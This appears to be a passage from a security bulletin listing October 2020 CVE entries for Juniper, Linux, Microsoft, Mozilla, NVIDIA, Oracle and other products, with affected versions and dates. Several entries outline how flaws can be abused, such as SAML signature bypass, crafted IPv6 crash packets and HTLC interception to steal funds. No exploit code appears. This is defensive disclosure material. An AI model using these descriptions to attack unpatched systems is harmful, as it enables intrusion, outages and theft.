CVE-2020-1678
CONFIRM
juniper_networks — junos_os_devices
 
On Juniper Networks Junos OS devices, a specific SNMP OID poll causes a memory leak which over time leads to a kernel crash (vmcore). Prior to the kernel crash other processes might be impacted, such as failure to establish SSH connection to the device. The administrator can monitor the output of the following command to check if there is memory leak caused by this issue: user@device> show system virtual-memory | match “pfe_ipc|kmem” pfe_ipc 147 5K – 164352 16,32,64,8192 <– increasing vm.kmem_map_free: 127246336 <– decreasing pfe_ipc 0 0K – 18598 32,8192 vm.kmem_map_free: 134582272 This issue affects Juniper Networks Junos OS: 17.4R3; 18.1 version 18.1R3-S5 and later versions prior to 18.1R3-S10; 18.2 version 18.2R3 and later versions prior to 18.2R3-S3; 18.2X75 version 18.2X75-D420, 18.2X75-D50 and later versions prior to 18.2X75-D430, 18.2X75-D53, 18.2X75-D60; 18.3 version 18.3R3 and later versions prior to 18.3R3-S2; 18.4 version 18.4R1-S4, 18.4R2 and later versions prior to 18.4R2-S5, 18.4R3-S1; 19.1 version 19.1R2 and later versions prior to 19.1R2-S2, 19.1R3; 19.2 version 19.2R1 and later versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S5, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS prior to 17.4R3. 2020-10-16 not yet calculated CVE-2020-1683
CONFIRM
juniper_networks — junos_os_devices
 
On Juniper Networks Junos OS devices, receipt of a malformed IPv6 packet may cause the system to crash and restart (vmcore). This issue can be trigged by a malformed IPv6 packet destined to the Routing Engine or a transit packet that is sampled using sFlow/jFlow or processed by firewall filter with the syslog and/or log action. An attacker can repeatedly send the offending packet resulting in an extended Denial of Service condition. Only IPv6 packets can trigger this issue. IPv4 packets cannot trigger this issue. This issue affects Juniper Networks Junos OS 18.4 versions prior to 18.4R2-S4, 18.4R3-S1; 19.1 versions prior to 19.1R2-S1, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2. This issue does not affect Juniper Networks Junos OS prior to 18.4R1. 2020-10-16 not yet calculated CVE-2020-1686
CONFIRM
juniper_networks — junos_os_devices
 
On SRX Series devices, a vulnerability in the key-management-daemon (kmd) daemon of Juniper Networks Junos OS allows an attacker to spoof packets targeted to IPSec peers before a security association (SA) is established thereby causing a failure to set up the IPSec channel. Sustained receipt of these spoofed packets can cause a sustained Denial of Service (DoS) condition. This issue affects IPv4 and IPv6 implementations. This issue affects Juniper Networks Junos OS on SRX Series: 12.3X48 versions prior to 12.3X48-D90; 15.1X49 versions prior to 15.1X49-D190; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R3; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3; 18.4 versions prior to 18.4R1-S6, 18.4R2-S3, 18.4R3; 19.1 versions prior to 19.1R1-S4, 19.1R2. This issue does not affect 12.3 or 15.1 releases which are non-SRX Series releases. 2020-10-16 not yet calculated CVE-2020-1657
CONFIRM
juniper_networks — mist_cloud_ui When SAML authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly handle child elements in SAML responses, allowing a remote attacker to modify a valid SAML response without invalidating its cryptographic signature to bypass SAML authentication security controls. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020. 2020-10-16 not yet calculated CVE-2020-1677
CONFIRM
juniper_networks — mist_cloud_ui When SAML authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly handle SAML responses, allowing a remote attacker to modify a valid SAML response without invalidating its cryptographic signature to bypass SAML authentication security controls. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020. 2020-10-16 not yet calculated CVE-2020-1676
CONFIRM
juniper_networks — mist_cloud_ui
 
When Security Assertion Markup Language (SAML) authentication is enabled, Juniper Networks Mist Cloud UI might incorrectly process invalid authentication certificates which could allow a malicious network-based user to access unauthorized data. This issue affects all Juniper Networks Mist Cloud UI versions prior to September 2 2020. 2020-10-16 not yet calculated CVE-2020-1675
CONFIRM
juniper_networks — multiple_devices
 
On Juniper Networks EX4300-MP Series, EX4600 Series and QFX5K Series deployed in (Ethernet VPN) EVPN-(Virtual Extensible LAN) VXLAN configuration, receipt of a stream of specific VXLAN encapsulated layer 2 frames can cause high CPU load, which could lead to network protocol operation issue and traffic interruption. This issue affects devices that are configured as a Layer 2 or Layer 3 gateway of an EVPN-VXLAN deployment. The offending layer 2 frames that cause the issue originate from a different access switch that get encapsulated within the same EVPN-VXLAN domain. This issue affects Juniper Networks Junos OS on EX4300-MP Series, EX4600 Series and QFX5K Series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1687
CONFIRM
juniper_networks — multiple_devices
 
On Juniper Networks EX4300-MP Series, EX4600 Series and QFX5K Series deployed in a Virtual Chassis configuration, receipt of a stream of specific layer 2 frames can cause high CPU load, which could lead to traffic interruption. This issue does not occur when the device is deployed in Stand Alone configuration. The offending layer 2 frame packets can originate only from within the broadcast domain where the device is connected. This issue affects Juniper Networks Junos OS on EX4300-MP Series, EX4600 Series and QFX5K Series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1689
CONFIRM
juniper_networks — mx_series_and_ex9200_series_devices On Juniper Networks MX Series and EX9200 Series, in a certain condition the IPv6 Distributed Denial of Service (DDoS) protection might not take affect when it reaches the threshold condition. The DDoS protection allows the device to continue to function while it is under DDoS attack, protecting both the Routing Engine (RE) and the Flexible PIC Concentrator (FPC) during the DDoS attack. When this issue occurs, the RE and/or the FPC can become overwhelmed, which could disrupt network protocol operations and/or interrupt traffic. This issue does not affect IPv4 DDoS protection. This issue affects MX Series and EX9200 Series with Trio-based PFEs (Packet Forwarding Engines). Please refer to https://kb.juniper.net/KB25385 for the list of Trio-based PFEs. This issue affects Juniper Networks Junos OS on MX series and EX9200 Series: 17.2 versions prior to 17.2R3-S4; 17.2X75 versions prior to 17.2X75-D102, 17.2X75-D110; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.2 versions prior to 18.2R2-S7, 18.2R3, 18.2R3-S3; 18.2X75 versions prior to 18.2X75-D30; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2. 2020-10-16 not yet calculated CVE-2020-1665
CONFIRM
MISC
juniper_networks — mx_series_devices
 
On Juniper Networks MX Series with MS-MIC or MS-MPC card configured with NAT64 configuration, receipt of a malformed IPv6 packet may crash the MS-PIC component on MS-MIC or MS-MPC. This issue occurs when a multiservice card is translating the malformed IPv6 packet to IPv4 packet. An unauthenticated attacker can continuously send crafted IPv6 packets through the device causing repetitive MS-PIC process crashes, resulting in an extended Denial of Service condition. This issue affects Juniper Networks Junos OS on MX Series: 15.1 versions prior to 15.1R7-S7; 15.1X53 versions prior to 15.1X53-D593; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S6; 17.4 versions prior to 17.4R2-S11, 17.4R3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.2X75 versions prior to 18.2X75-D41, 18.2X75-D430, 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R2-S5, 18.4R3; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R2. 2020-10-16 not yet calculated CVE-2020-1680
CONFIRM
juniper_networks — nfx350_series_devices
 
The Juniper Device Manager (JDM) container, used by the disaggregated Junos OS architecture on Juniper Networks NFX350 Series devices, stores password hashes in the world-readable file /etc/passwd. This is not a security best current practice as it can allow an attacker with access to the local filesystem the ability to brute-force decrypt password hashes stored on the system. This issue affects Juniper Networks Junos OS on NFX350: 19.4 versions prior to 19.4R3; 20.1 versions prior to 20.1R1-S4, 20.1R2. 2020-10-16 not yet calculated CVE-2020-1669
CONFIRM
juniper_networks — ptx/qfx_series_devices On Juniper Networks PTX and QFX Series devices with packet sampling configured using tunnel-observation mpls-over-udp, sampling of a malformed packet can cause the Kernel Routing Table (KRT) queue to become stuck. KRT is the module within the Routing Process Daemon (RPD) that synchronized the routing tables with the forwarding tables in the kernel. This table is then synchronized to the Packet Forwarding Engine (PFE) via the KRT queue. Thus, when KRT queue become stuck, it can lead to unexpected packet forwarding issues. An administrator can monitor the following command to check if there is the KRT queue is stuck: user@device > show krt state … Number of async queue entries: 65007 <— this value keep on increasing. When this issue occurs, the following message might appear in the /var/log/messages: DATE DEVICE kernel: %KERN-3: rt_pfe_veto: Too many delayed route/nexthop unrefs. Op 2 err 55, rtsm_id 5:-1, msg type 2 DATE DEVICE kernel: %KERN-3: rt_pfe_veto: Memory usage of M_RTNEXTHOP type = (0) Max size possible for M_RTNEXTHOP type = (7297134592) Current delayed unref = (60000), Current unique delayed unref = (18420), Max delayed unref on this platform = (40000) Current delayed weight unref = (60000) Max delayed weight unref on this platform= (400000) curproc = rpd This issue affects Juniper Networks Junos OS on PTX/QFX Series: 17.2X75 versions prior to 17.2X75-D105; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.2X75 versions prior to 18.2X75-D420, 18.2X75-D53, 18.2X75-D65; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S2, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. This issue does not affect Juniper Networks Junos OS prior to 18.1R1. 2020-10-16 not yet calculated CVE-2020-1679
CONFIRM
juniper_networks — qfx5k_series_devices When configuring stateless firewall filters in Juniper Networks EX4600 and QFX 5000 Series devices using Virtual Extensible LAN protocol (VXLAN), the discard action will fail to discard traffic under certain conditions. Given a firewall filter configuration similar to: family ethernet-switching { filter L2-VLAN { term ALLOW { from { user-vlan-id 100; } then { accept; } } term NON-MATCH { then { discard; } } when there is only one term containing a ‘user-vlan-id’ match condition, and no other terms in the firewall filter except discard, the discard action for non-matching traffic will only discard traffic with the same VLAN ID specified under ‘user-vlan-id’. Other traffic (e.g. VLAN ID 200) will not be discarded. This unexpected behavior can lead to unintended traffic passing through the interface where the firewall filter is applied. This issue only affects systems using VXLANs. This issue affects Juniper Networks Junos OS on QFX5K Series: 18.1 versions prior to 18.1R3-S7, except 18.1R3; 18.2 versions prior to 18.2R2-S7, 18.2R3-S1; 18.3 versions prior to 18.3R1-S5, 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S1, 18.4R3; 19.1 versions prior to 19.1R1-S5, 19.1R2; 19.2 versions prior to 19.2R1-S5, 19.2R2. 2020-10-16 not yet calculated CVE-2020-1685
CONFIRM
juniper_networks — srx_series_and_nfx_series_devices
 
On Juniper Networks SRX Series and NFX Series, a local authenticated user with access to the shell may obtain the Web API service private key that is used to provide encrypted communication between the Juniper device and the authenticator services. Exploitation of this vulnerability may allow an attacker to decrypt the communications between the Juniper device and the authenticator service. This Web API service is used for authentication services such as the Juniper Identity Management Service, used to obtain user identity for Integrated User Firewall feature, or the integrated ClearPass authentication and enforcement feature. This issue affects Juniper Networks Junos OS on Networks SRX Series and NFX Series: 12.3X48 versions prior to 12.3X48-D105; 15.1X49 versions prior to 15.1X49-D190; 16.1 versions prior to 16.1R7-S8; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S11, 17.4R3; 18.1 versions prior to 18.1R3-S7; 18.2 versions prior to 18.2R3; 18.3 versions prior to 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R1-S7, 18.4R2; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S4, 19.2R2. 2020-10-16 not yet calculated CVE-2020-1688
MISC
CONFIRM
MISC
MISC
MISC
juniper_networks — srx_series_devices
 
On Juniper Networks SRX Series configured with application identification inspection enabled, receipt of specific HTTP traffic can cause high CPU load utilization, which could lead to traffic interruption. Application identification is enabled by default and is automatically turned on when Intrusion Detection and Prevention (IDP), AppFW, AppQoS, or AppTrack is configured. Thus, this issue might occur when IDP, AppFW, AppQoS, or AppTrack is configured. This issue affects Juniper Networks Junos OS on SRX Series: 12.3X48 versions prior to 12.3X48-D105; 15.1X49 versions prior to 15.1X49-D221, 15.1X49-D230; 17.4 versions prior to 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S3; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S5, 18.4R3-S1; 19.1 versions prior to 19.1R2-S2, 19.1R3; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R2. 2020-10-16 not yet calculated CVE-2020-1684
CONFIRM
levistudiou — release_build
 
An XXE vulnerability exists within LeviStudioU Release Build 2019-09-21 and prior when processing parameter entities, which may allow file disclosure. 2020-10-22 not yet calculated CVE-2020-25186
MISC

lightning_network_daemon — lightning_network_daemon

Prior to 0.11.0-beta, LND (Lightning Network Daemon) had a vulnerability in its invoice database. While claiming on-chain a received HTLC output, it didn’t verify that the corresponding outgoing off-chain HTLC was already settled before releasing the preimage. In the case of a hash-and-amount collision with an invoice, the preimage for an expected payment was instead released. A malicious peer could have deliberately intercepted an HTLC intended for the victim node, probed the preimage through a colluding relayed HTLC, and stolen the intercepted HTLC. The impact is a loss of funds in certain situations, and a weakening of the victim’s receiver privacy. 2020-10-21 not yet calculated CVE-2020-26896
MISC
MISC
MISC
lightning_network_daemon — lightning_network_daemon
 
Prior to 0.10.0-beta, LND (Lightning Network Daemon) would have accepted a counterparty high-S signature and broadcast tx-relay invalid local commitment/HTLC transactions. This can be exploited by any peer with an open channel regardless of the victim situation (e.g., routing node, payment-receiver, or payment-sender). The impact is a loss of funds in certain situations. 2020-10-21 not yet calculated CVE-2020-26895
MISC
MISC
MISC
linux — linux_kernel
 
An issue was discovered in the Linux kernel through 5.9.1, as used with Xen through 4.14.x. drivers/xen/events/events_base.c allows event-channel removal during the event-handling loop (a race condition). This can cause a use-after-free or NULL pointer dereference, as demonstrated by a dom0 crash via events for an in-reconfiguration paravirtualized device, aka CID-073d0552ead5. 2020-10-22 not yet calculated CVE-2020-27675
MISC
MISC
MISC
linux — linux_kernel
 
An issue was discovered in the Linux kernel through 5.9.1, as used with Xen through 4.14.x. Guest OS users can cause a denial of service (host OS hang) via a high rate of events to dom0, aka CID-e99502f76271. 2020-10-22 not yet calculated CVE-2020-27673
MISC
MISC
MISC
linux — linux_kernel
 
An issue was discovered in the Linux kernel before 5.8.15. scalar32_min_max_or in kernel/bpf/verifier.c mishandles bounds tracking during use of 64-bit values, aka CID-5b9fbeb75b6a. 2020-10-16 not yet calculated CVE-2020-27194
MISC
MISC
mark_text — mark_text
 
Mutation XSS exists in Mark Text through 0.16.2 that leads to Remote Code Execution. NOTE: this might be considered a duplicate of CVE-2020-26870; however, it can also be considered an issue in the design of the “source code mode” feature, which parses HTML even though HTML support is not one of the primary advertised roles of the product. 2020-10-16 not yet calculated CVE-2020-27176
MISC
mediawiki — mediawiki
 
The Cosmos Skin for MediaWiki through 1.35.0 has stored XSS because MediaWiki messages were not being properly escaped. This is related to wfMessage and Html::rawElement, as demonstrated by CosmosSocialProfile::getUserGroups. 2020-10-22 not yet calculated CVE-2020-27620
MISC
MISC
MISC
MISC
mediawiki — mediawiki
 
The FileImporter extension in MediaWiki through 1.35.0 was not properly attributing various user actions to a specific user’s IP address. Instead, for various actions, it would report the IP address of an internal Wikimedia Foundation server by omitting X-Forwarded-For data. This resulted in an inability to properly audit and attribute various user actions performed via the FileImporter extension. 2020-10-22 not yet calculated CVE-2020-27621
MISC
MISC
micro_focus — operation_bridge_manager
 
An arbitrary code execution vulnerability exists in Micro Focus Operation Bridge Manager 2020.05, 2019.11, 2019.05, 2018.11, 2018.05, versions 10.6x and 10.1x and older versions. The vulnerability could allow remote attackers to execute arbitrary code. 2020-10-22 not yet calculated CVE-2020-11853
MISC
microchip — cryptoauthlib
 
Microchip CryptoAuthentication Library CryptoAuthLib prior to 20191122 has a Buffer Overflow (issue 2 of 2). 2020-10-22 not yet calculated CVE-2019-16129
MLIST
MISC
MISC
microchip — cryptoauthlib
 
Microchip CryptoAuthentication Library CryptoAuthLib prior to 20191122 has a Buffer Overflow (issue 1 of 2). 2020-10-22 not yet calculated CVE-2019-16128
MLIST
MISC
MISC
microsoft — azure_functions
 
An elevation of privilege vulnerability exists in the way Azure Functions validate access keys.An unauthenticated attacker who successfully exploited this vulnerability could invoke an HTTP Function without proper authorization.This security update addresses the vulnerability by correctly validating access keys used to access HTTP Functions., aka ‘Azure Functions Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16904
MISC
microsoft — windows
 
On Windows the Veyon Service before version 4.4.2 contains an unquoted service path vulnerability, allowing locally authenticated users with administrative privileges to run malicious executables with LocalSystem privileges. Since Veyon users (both students and teachers) usually don’t have administrative privileges, this vulnerability is only dangerous in anyway unsafe setups. The problem has been fixed in version 4.4.2. As a workaround, the exploitation of the vulnerability can be prevented by revoking administrative privileges from all potentially untrustworthy users. 2020-10-19 not yet calculated CVE-2020-15261
MISC
MISC
CONFIRM
microsoft — windows_10
 
An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior.A locally authenticated attacker could run arbitrary code with elevated system privileges, aka ‘Windows Installer Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16902
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists in the way that the Windows kernel image handles objects in memory.An attacker who successfully exploited the vulnerability could execute code with elevated permissions.To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.The security update addresses the vulnerability by ensuring the Windows kernel image properly handles objects in memory., aka ‘Windows Image Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16892
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory, aka ‘Windows Network Connections Service Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16887
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows Event System improperly handles objects in memory.To exploit this vulnerability, an attacker would first have to gain execution on the victim system, aka ‘Windows Event System Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16900
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when Windows improperly handles COM object creation, aka ‘Windows COM Server Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16935. 2020-10-16 not yet calculated CVE-2020-16916
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows Storage VSP Driver improperly handles file operations, aka ‘Windows Storage VSP Driver Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16885
MISC
microsoft — windows_10
 
An information disclosure vulnerability exists when the Windows KernelStream improperly handles objects in memory, aka ‘Windows KernelStream Information Disclosure Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16889
MISC
microsoft — windows_10
 
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka ‘Windows Kernel Elevation of Privilege Vulnerability’. 2020-10-16 not yet calculated CVE-2020-16890
MISC
mozilla — firefox When a link to an external protocol was clicked, a prompt was presented that allowed the user to choose what application to open it in. An attacker could induce that prompt to be associated with an origin they didn’t control, resulting in a spoofing attack. This was fixed by changing external protocol prompts to be tab-modal while also ensuring they could not be incorrectly associated with a different origin. This vulnerability affects Firefox < 82. 2020-10-22 not yet calculated CVE-2020-15682
MISC
MISC
mozilla — firefox
 
Mozilla developers reported memory safety bugs present in Firefox 81. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 82. 2020-10-22 not yet calculated CVE-2020-15684
MISC
MISC
mozilla — firefox
 
When multiple WASM threads had a reference to a module, and were looking up exported functions, one WASM thread could have overwritten another’s entry in a shared stub table, resulting in a potentially exploitable crash. This vulnerability affects Firefox < 82. 2020-10-22 not yet calculated CVE-2020-15681
MISC
MISC
mozilla — firefox
 
If a valid external protocol handler was referenced in an image tag, the resulting broken image size could be distinguished from a broken image size of a non-existent protocol handler. This allowed an attacker to successfully probe whether an external protocol handler was registered. This vulnerability affects Firefox < 82. 2020-10-22 not yet calculated CVE-2020-15680
MISC
MISC
mozilla — multiple_products
 
Mozilla developers and community members reported memory safety bugs present in Firefox 81 and Firefox ESR 78.3. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 78.4, Firefox < 82, and Thunderbird < 78.4. 2020-10-22 not yet calculated CVE-2020-15683
MISC
MISC
MISC
MISC
mozilla — network_security_services
 
In Network Security Services (NSS) before 3.46, several cryptographic primitives had missing length checks. In cases where the application calling the library did not perform a sanity check on the inputs it could result in a crash due to a buffer overflow. 2020-10-22 not yet calculated CVE-2019-17006
MISC
MISC
mozilla — network_security_services
 
In Network Security Services before 3.44, a malformed Netscape Certificate Sequence can cause NSS to crash, resulting in a denial of service. 2020-10-22 not yet calculated CVE-2019-17007
MISC
MISC
mozilla — network_security_services
 
In Network Security Services (NSS) before 3.36.7 and before 3.41.1, a malformed signature can cause a crash due to a null dereference, resulting in a Denial of Service. 2020-10-22 not yet calculated CVE-2018-18508
MISC
MISC
netwrix — account_lockout_examiner
 
Netwrix Account Lockout Examiner before 5.1 allows remote attackers to capture the Net-NTLMv1/v2 authentication challenge hash of the Domain Administrator (that is configured within the product in its installation state) by generating a single Kerberos Pre-Authentication Failed (ID 4771) event on a Domain Controller. 2020-10-20 not yet calculated CVE-2020-15931
CONFIRM
MISC
nvidia — geforce_experience NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in the ShadowPlay component which may lead to local privilege escalation, code execution, denial of service or information disclosure. 2020-10-23 not yet calculated CVE-2020-5990
CONFIRM
nvidia — geforce_experience NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in its services in which a folder is created by nvcontainer.exe under normal user login with LOCAL_SYSTEM privileges which may lead to a denial of service or escalation of privileges. 2020-10-23 not yet calculated CVE-2020-5978
CONFIRM
nvidia — geforce_experience
 
NVIDIA GeForce Experience, all versions prior to 3.20.5.70, contains a vulnerability in NVIDIA Web Helper NodeJS Web Server in which an uncontrolled search path is used to load a node module, which may lead to code execution, denial of service, escalation of privileges, and information disclosure. 2020-10-23 not yet calculated CVE-2020-5977
CONFIRM
object-path — object-path
 
A prototype pollution vulnerability has been found in `object-path` <= 0.11.4 affecting the `set()` method. The vulnerability is limited to the `includeInheritedProps` mode (if version >= 0.11.0 is used), which has to be explicitly enabled by creating a new instance of `object-path` and setting the option `includeInheritedProps: true`, or by using the default `withInheritedProps` instance. The default operating mode is not affected by the vulnerability if version >= 0.11.0 is used. Any usage of `set()` in versions < 0.11.0 is vulnerable. The issue is fixed in object-path version 0.11.5 As a workaround, don’t use the `includeInheritedProps: true` options or the `withInheritedProps` instance if using a version >= 0.11.0. 2020-10-19 not yet calculated CVE-2020-15256
MISC
CONFIRM
octopus — octupus_deploy
 
An issue was discovered in Octopus Deploy through 2020.4.4. If enabled, the websocket endpoint may allow an untrusted tentacle host to present itself as a trusted one. 2020-10-22 not yet calculated CVE-2020-27155
MISC
MISC
MISC
MISC
omniauth-auth0 — omniauth-auth0
 
omniauth-auth0 (rubygems) versions >= 2.3.0 and < 2.4.1 improperly validate the JWT token signature when using the `jwt_validator.verify` method. Improper validation of the JWT token signature can allow an attacker to bypass authentication and authorization. You are affected by this vulnerability if all of the following conditions apply: 1. You are using `omniauth-auth0`. 2. You are using `JWTValidator.verify` method directly OR you are not authenticating using the SDK’s default Authorization Code Flow. The issue is patched in version 2.4.1. 2020-10-21 not yet calculated CVE-2020-15240
MISC
CONFIRM
MISC
open-xchange — ox_app_suite
 
OX App Suite through 7.10.3 allows stats/diagnostic?param= XSS. 2020-10-23 not yet calculated CVE-2020-15004
MISC
MISC
open-xchange — ox_app_suite
 
OX App Suite through 7.10.3 allows Information Exposure because a user can obtain the IP address and User-Agent string of a different user (via the session API during shared Drive access). 2020-10-23 not yet calculated CVE-2020-15003
CONFIRM
MISC
open-xchange — ox_app_suite
 
OX App Suite through 7.10.3 allows SSRF via the the /ajax/messaging/message message API. 2020-10-23 not yet calculated CVE-2020-15002
CONFIRM
MISC
openstack — blazer_dashboard
 
An issue was discovered in OpenStack blazar-dashboard before 1.3.1, 2.0.0, and 3.0.0. A user allowed to access the Blazar dashboard in Horizon may trigger code execution on the Horizon host as the user the Horizon service runs under (because the Python eval function is used). This may result in Horizon host unauthorized access and further compromise of the Horizon service. All setups using the Horizon dashboard with the blazar-dashboard plugin are affected. 2020-10-16 not yet calculated CVE-2020-26943
MLIST
MISC
MISC
MISC
MISC
MISC
MISC
CONFIRM
oracle — bi-publisher
 
Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: BI Publisher Security). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14842
MISC
oracle — bi_publisher
 
Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite – XDO). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise BI Publisher. While the vulnerability is in BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 8.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14880
MISC
oracle — bi_publisher
 
Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: BI Publisher Security). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14780
MISC
oracle — bi_publisher
 
Vulnerability in the BI Publisher product of Oracle Fusion Middleware (component: E-Business Suite – XDO). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise BI Publisher. While the vulnerability is in BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all BI Publisher accessible data as well as unauthorized update, insert or delete access to some of BI Publisher accessible data. CVSS 3.1 Base Score 8.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14879
MISC
oracle — bi_publisher
 
